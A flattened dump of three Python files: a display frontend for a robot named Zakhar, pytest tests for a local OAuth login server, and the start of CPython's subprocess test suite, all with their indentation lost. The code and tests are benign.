from brain_pycore.thread import StoppableThread
from brain_pycore.logging import new_logger
from brain_service_common.common_types import Status
from brain_service_common.constants import DEFAULT_BACKEND_HOST, DEFAULT_BACKEND_PORT
from .display import Display
class ZakharServiceFrontend:
ERROR_SYMBOL = "e"
WARNING_SYMBOL = "w"
def __init__(self, log_level=INFO) -> None:
self.log = new_logger("Front", log_level=log_level)
self.thread_main = None # type: Union[StoppableThread, None]
self.thread_reader = None # type: Union[StoppableThread, None]
self.display = Display(IS_WINDOWS)
self.markers = {"err": "", "warn": ""}
self.data = {}
self.socket = None
self.start()
def __del__(self):
self.stop()
def _connect(self):
self.log.info("Connecting ...")
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.settimeout(1)
self.socket.connect((DEFAULT_BACKEND_HOST, DEFAULT_BACKEND_PORT))
self.log.info("Connect!")
def _receive_backend_data(self):
if self.socket:
self.log.debug(f"Receiving...")
new_data_raw = self.socket.recv(1024).decode()
new_data = ast.literal_eval(new_data_raw)
self.data = new_data
self.log.debug(f"{self.data}")
def _reader_main(self):
while True:
try:
self._connect()
break
except ConnectionRefusedError:
t = 2
self.log.warn(f"Connection refused! Wait for {t} sec and retry...")
time.sleep(t)
while True:
try:
self._receive_backend_data()
except Exception as e:
# Print any error
self.log.error(str(e))
def _get_markers_str(self) -> str:
s = ""
for m in self.markers.values():
s += m
if s:
s = s + " | "
return s
def _show_errors_and_warns(self):
if self.data.get("err") and self.data["err"].keys():
self.markers["err"] = self.ERROR_SYMBOL
for err, msg in self.data["err"].items():
self.display.show_mm(f"{self.ERROR_SYMBOL} | Error: {err}", msg, 2)
else:
self.markers["err"] = ""
if self.data.get("warn") and self.data["warn"].keys():
self.markers["warn"] = self.WARNING_SYMBOL
for wrn, msg in self.data["warn"].items():
self.display.show_mm(f"{self.WARNING_SYMBOL} | Warn: {wrn}", msg, 1)
else:
self.markers["warn"] = ""
def _show_os_status(self):
os = self.data.get("os")
if os:
# self.display.show_sl(f"{self._get_markers_str()} Time:", os.get("time"), .5)
self.display.show_mm(f"{self._get_markers_str()}IP: {os.get('ip')}",
f"Net: {os.get('wifi_net')}", 1)
def _show_devices(self):
def _get_dev_str(devs) -> str:
d_str = ""
if devs and devs.keys():
for dev, val in devs.items():
if val == Status.ACTIVE:
val = "x"
elif val == Status.INACTIVE:
val = " "
elif val == Status.NA:
val = "/"
else:
val = "?"
d_str += f"{dev[0]}:[{val}] "
return d_str.strip()
dev = self.data.get("dev")
if dev:
self.display.show_mm(f"{self._get_markers_str()}Devices:",
_get_dev_str(self.data["dev"]), 1)
def _main_intro(self):
self.display.show_l("Hello!", 1)
self.display.show_l("I am Zakhar!", 1)
def _main_once(self):
self._show_errors_and_warns()
self._show_os_status()
self._show_devices()
def main(self):
self._main_intro()
while True:
self._main_once()
def start(self):
self.thread_reader = StoppableThread(target=self._reader_main)
self.thread_main = StoppableThread(target=self.main)
self.thread_main.start()
self.thread_reader.start()
def stop(self):
self.log.info("Terminating...")
if self.display:
self.display.show_l("Turn off", 1)
if self.thread_main:
self.thread_main.stop()
|
test_local_server.py
|
import threading
import requests
import pytest
from six.moves.urllib.parse import urlencode
from fair_research_login.local_server import LocalServerCodeHandler
from fair_research_login.exc import LocalServerError
class LocalServerTester:
def __init__(self, handler):
self.handler = handler
self.server_response = None
self.response = None
def _wait_for_code(self):
try:
self.server_response = self.handler.get_code()
except Exception as e:
self.server_response = e
def test(self, response_params):
"""
Start a local server to wait for an 'auth_code'. Usually the user's
browser will redirect to this location, but in this case the user is
mocked with a separate request in another thread.
Waits for threads to complete and returns the local_server response.
"""
with self.handler.start():
thread = threading.Thread(target=self._wait_for_code)
thread.start()
url = "{}/?{}".format(self.handler.get_redirect_uri(),
urlencode(response_params))
self.response = requests.get(url)
thread.join()
return self.server_response
def test_local_server_with_auth_code():
server = LocalServerTester(LocalServerCodeHandler())
assert server.test({"code": 'test_code'}) == 'test_code'
def test_local_server_with_error():
server = LocalServerTester(LocalServerCodeHandler())
response = server.test({"error": "bad things happened"})
assert isinstance(response, LocalServerError)
def test_local_server_with_custom_template():
template = 'HIGHLY CUSTOMIZED TEMPLATE'
server = LocalServerTester(LocalServerCodeHandler(template=template))
server.test({'code': 'test_code'})
assert server.response.text == template
# Test you don't need to pass $error in the template
server = LocalServerTester(LocalServerCodeHandler(template=template))
server.test({'error': 'a bad thing'})
assert server.response.text == template
def test_local_server_with_custom_template_vars():
template_vars = {
'defaults': {
'app_name': '', # Auto-populated if blank, but can be changed
'post_login_message': 'you are now logged in, congrats!',
'error': '', # Present if there is an error in Globus Auth
'login_result': ''
},
'error': {},
'success': {}
}
class MockNativeClient:
app_name = 'My Wicked Cool App'
local_server = LocalServerCodeHandler(template_vars=template_vars)
local_server.set_context(MockNativeClient)
server = LocalServerTester(local_server)
server.test({'code': 'test_code'})
assert (template_vars['defaults']['post_login_message'] in
server.response.text)
assert 'My Wicked Cool App' in server.response.text
def test_bad_template_vars():
tvars = {'defaults': {}}
with pytest.raises(ValueError):
server = LocalServerTester(LocalServerCodeHandler(template_vars=tvars))
server.test({'code': 'test_code'})
def test_missing_template_vars():
tvars = {'defaults': {'foo': 'bar'}, 'error': {}, 'success': {}}
with pytest.raises(KeyError):
server = LocalServerTester(LocalServerCodeHandler(template_vars=tvars))
server.test({'code': 'test_code'})
def test_access_server_before_started():
with pytest.raises(LocalServerError):
LocalServerCodeHandler().server
def test_server_timeout():
handler = LocalServerCodeHandler()
with handler.start():
handler.server.timeout = 1
with pytest.raises(LocalServerError):
handler.get_code()
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises((FileNotFoundError, PermissionError),
self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
